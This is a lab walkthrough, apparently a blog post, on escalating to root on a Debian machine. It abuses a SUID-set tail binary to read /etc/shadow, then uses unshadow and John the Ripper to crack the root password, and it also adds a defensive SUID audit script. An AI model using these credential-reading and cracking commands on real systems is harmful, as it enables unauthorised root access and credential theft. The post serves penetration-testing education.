In the first part of this series we found a user’s password with Hydra by simply attacking his account via SSH. This is a so-called “dictionary attack”, and because of the lack of security measures we could get into the remote system.
In this exercise we continue our Ethical Hacking journey and find a way to get root privileges on the remote machine. This is called privilege escalation.

Important note: cracking passwords in the wild is illegal! Do NOT do it out of the lab, unless you are a penetration tester with a signed contract!
The hacker’s machine: Kali Linux [192.168.23.131]
The attacked machine: Debian Bullseye [192.168.23.133]
The two machines can see each other on the network.
The attacked machine runs an SSHd with password authentication.
We know the name of the user on the system: badpassjoe
We already know the password of badpassjoe: admin123
Step 1: access the password database
There are a lot of enumeration techniques that can help us find a way to elevate privileges on a Linux server. The Penetration Tester must consider everything very carefully and find the attack vectors.
In this example we will check the binaries and look for the SUID bit.
SUID is a special permission that allows a binary to run with elevated privileges. A file with the SUID bit set executes as the user who owns the file. If that owner is root, then we can run the file as root.
The following command lists every file that has the SUID (or SGID) bit set.
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null
We can already see something interesting! The tail command is used to read the contents of files, and it should not have the SUID bit set.
-rwsr-sr-x 1 root root 76864 Sep 24 2020 /usr/bin/tail
The /usr/bin/tail binary has the SUID bit set and its owner is root, so we know that we can exploit it to read files as root!
Let’s open GTFOBins and confirm it.
GTFOBins lists a tail invocation that prints a whole file as root.
We know that the password hashes of all Linux users, including root, are stored in the /etc/shadow file. As a regular user we cannot read it because we get a “Permission denied” message, but with the SUID bit on tail we can read its contents.
As badpassjoe we can read the /etc/shadow file with the following command:
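As an added defender-side check (not part of the original post): a small POSIX shell audit that compares the output of the find command above against a baseline of binaries that are expected to carry the SUID/SGID bits, so a stray bit like the one on tail shows up on its own line. The sample listing, its sizes and dates, the BASELINE contents and the function names unexpected_suid, audit_sample and audit_live are all constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original post): audit a SUID/SGID listing
# against a baseline of binaries that are expected to carry those bits.
# The listing below is constructed to mirror the `find ... -exec ls -l`
# output in the post; sizes and dates are made up, except the tail line.

# Constructed sample listing. Only /usr/bin/tail should be flagged.
SAMPLE_LISTING='-rwsr-xr-x 1 root root 63960 Feb  7  2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 55528 Feb  7  2020 /usr/bin/su
-rwsr-sr-x 1 root root 76864 Sep 24  2020 /usr/bin/tail
-rwsr-xr-x 1 root root 52880 Feb  7  2020 /usr/bin/chsh'

# Hypothetical baseline: on a real host, generate it from a known-good
# install of the same distribution release and keep it under change control.
BASELINE='/usr/bin/passwd /usr/bin/su /usr/bin/chsh'

# Read `ls -l` lines on stdin and print mode, owner and path for every file
# whose path is not in the baseline ($1, whitespace-separated).
unexpected_suid() {
    baseline="$1"
    while read -r mode _links owner _group _size _mon _day _year path; do
        [ -n "$path" ] || continue
        case " $baseline " in
            *" $path "*) ;;                                  # expected, skip
            *) printf '%s %s %s\n' "$mode" "$owner" "$path" ;;
        esac
    done
}

# Run the audit over the constructed listing (used by the test).
audit_sample() {
    printf '%s\n' "$SAMPLE_LISTING" | unexpected_suid "$BASELINE"
}

# Run the audit over the live filesystem with the post's find command.
audit_live() {
    find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null \
        | unexpected_suid "$BASELINE"
}

audit_sample
```

Run on the constructed listing it prints only `-rwsr-sr-x root /usr/bin/tail`. Anything the audit reports that was not deliberately installed with the bit can be fixed with `chmod u-s` (and `chmod g-s` for SGID) on that file, and a scheduled run of audit_live gives you a simple drift check for future changes.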
tail -c1G /etc/shadow
Let’s copy the contents of the /etc/shadow and /etc/passwd files to our Kali Linux box.
Now we are ready to crack the root password with John the Ripper on our Kali Linux!
Step 2: crack the collected password database
With the unshadow command we will combine the two files into a password database.
unshadow passwd.txt shadow.txt > password.db
The two files hold the contents of /etc/passwd and /etc/shadow, and the result is written to password.db.
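To make the shape of password.db clear, here is an added example (not from the original post and not John the Ripper’s own code) that performs the same join as unshadow with awk: the “x” in the second field of each passwd line is replaced by the hash from the matching shadow entry. The passwd and shadow excerpts are constructed, the hashes are placeholders rather than real digests, and the function names merge_shadow and merge_sample are my own.

```shell
#!/bin/sh
# Added example (not from the original post): reproduce what unshadow does
# with a small awk join, so the shape of password.db is clear. The passwd and
# shadow excerpts below are constructed; the hashes are placeholders, not
# real digests of any password.

# Constructed /etc/passwd excerpt (field 2 is "x": the hash lives in shadow).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
badpassjoe:x:1000:1000:Joe:/home/badpassjoe:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin'

# Constructed /etc/shadow excerpt ("*" marks an account with no password set).
SAMPLE_SHADOW='root:$6$ROOTSALT$PLACEHOLDERHASH:18900:0:99999:7:::
badpassjoe:$6$JOESALT$PLACEHOLDERHASH:18900:0:99999:7:::
nobody:*:18900:0:99999:7:::'

# Join passwd ($1) with shadow ($2): the "x" in passwd field 2 is replaced by
# the hash from the shadow entry of the same user. Output matches unshadow.
merge_shadow() {
    awk -F: -v OFS=: '
        NR == FNR { hash[$1] = $2; next }   # first file: remember hashes
        $1 in hash { $2 = hash[$1] }        # second file: splice hash in
        { print }
    ' "$2" "$1"
}

# Write the constructed excerpts to temporary files and merge them.
merge_sample() {
    tmp=$(mktemp -d) || return 1
    printf '%s\n' "$SAMPLE_PASSWD" > "$tmp/passwd.txt"
    printf '%s\n' "$SAMPLE_SHADOW" > "$tmp/shadow.txt"
    merge_shadow "$tmp/passwd.txt" "$tmp/shadow.txt"
    rm -rf "$tmp"
}

merge_sample
```

The merged lines carry the hash where /etc/passwd has its “x”, which is why a file like password.db must be handled with the same care as /etc/shadow itself: anyone who can read it can run a dictionary attack offline, exactly as the next step does.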
Let’s crack this with John the Ripper!
john --wordlist=top-ssh-mistakes.txt --format=crypt password.db
When we see the “Session completed.” message we can check the cracked passwords.
┌──(kali㉿kali)-[~]
└─$ john --show password.db
root:Password1234:0:0:root:/root:/bin/bash
Now that we have cracked the weak password of the root user, we can log in to the Debian box as badpassjoe and elevate privileges to root with the su command.
Let’s look around!
badpassjoe@debian:~$ su -
Password:
root@debian:~# ls
flag.txt
root@debian:~# cat flag.txt
TOM{OH_THE_ROOT}
Final thoughts
Never use a weak root password that is easy to guess from a dictionary.
Be careful when setting the SUID bit on any binary, because it can open up a new attack surface for malicious actors.
If you have anything to share, please visit my Tom’s IT Cafe Discord Server.
Excellent 🙂
Thank you! 😊